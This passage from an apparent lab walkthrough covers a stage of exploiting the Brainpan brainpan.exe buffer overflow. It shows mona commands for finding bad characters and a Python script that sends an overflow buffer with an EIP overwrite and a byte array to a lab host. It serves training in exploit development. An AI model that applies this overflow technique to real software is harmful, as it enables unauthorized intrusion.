When crafting a shellcode, it's crucial to identify which characters may cause issues, referred to as bad characters, and which are safe to use. To streamline the process of finding these bad characters for our exploit, we will leverage mona within Immunity Debugger. First, we configure mona's working directory in Immunity Debugger using the following command:
!mona config -set workingfolder c:\mona
This sets the working directory for mona in Immunity Debugger. With the working directory configured, we can generate a bad character byte array using mona with the following command:
!mona bytearray -cpb "\x00
The generated bad character byte array can be found in the mona working directory, stored in a file named bytearray.txt.
We then send this bad character array to our brainpan.exe TCP server after overwriting the EIP. For this purpose, I've created another script called brainpan_badchars.py. This script incorporates the mona bad characters array into the payload.
#!/usr/bin/python3
import sys
import socket
from time import sleep
badchars = (
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer = b"A" * 510 + b"B" * 4 + badchars
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.10.4', 9999))
payload = b'shitstorm /.:/' + buffer
sock.send(payload)
sock.close()
except:
print("Error connecting to the server")
sys.exit()After executing the script and inspecting the ESP (Extended Stack Pointer) dump in Immunity Debugger (to dump the ESP, right-click on the ESP and from the drop-down menu, select Follow in Dump. It will dump and display all hex characters that we send with our python script), we can clearly observe all the bad characters sent by the Python program in Immunity Debugger:
we retrieved the contents of ESP, which was the memory address 005FF910. To check for any undesirable characters specific to our exploit, we utilized mona with the following command within Immunity Debugger:
!mona compare -f c:\mona\bytearray.bin -a 005FF910
Mona performed a comparison between the generated byte array and the ESP dump.
In the context of brainpan.exe, no bad characters were detected for our shellcode.
Now that we have identified the bad characters to avoid in our exploit, our next step is to find the suitable module for our payload.
Next, we'll proceed to Finding the right module